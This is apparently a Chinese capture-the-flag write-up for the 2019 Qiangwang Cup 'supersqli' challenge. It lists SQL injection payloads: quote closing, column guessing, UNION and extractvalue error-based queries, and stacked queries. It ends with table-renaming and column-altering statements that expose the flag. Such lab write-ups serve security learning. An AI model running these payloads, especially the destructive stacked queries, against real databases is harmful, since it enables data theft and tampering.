1‘ and ‘0,1‘ and ‘1 : 单引号闭合
1‘ order by 3--+ : 猜字段
1‘ union select 1,database()# :开始注入,发现正则过滤
1‘ and extractvalue(0x0a,concat(0x0a,(database())))# :数据库 :supersqli
0‘;show databases;# : 尝试一堆后发现堆叠注入 
0‘;show tables;#
然后就迷了,怎么从表中得到字段呢?后来查资料才知道,show也是可以查字段的。
0‘;show columns from words;#
0‘;show columns from `1919810931114514`;#
好吧接下来菜鸡真的懵了,贴一位师傅的WP——强网杯2019随便注
开始复现
1.将words表改名为word1或其它任意名字 : rename table words to new_word;
2.1919810931114514改名为words : rename table 1919810931114514 to new_19198;
3.将新的word表插入一列,列名为id : alter table words add id int unsigned not Null auto_increment primary key;
4.将flag列改名为data : alert table words change flag data varchar(100);
原文:https://www.cnblogs.com/chrysanthemum/p/11657008.html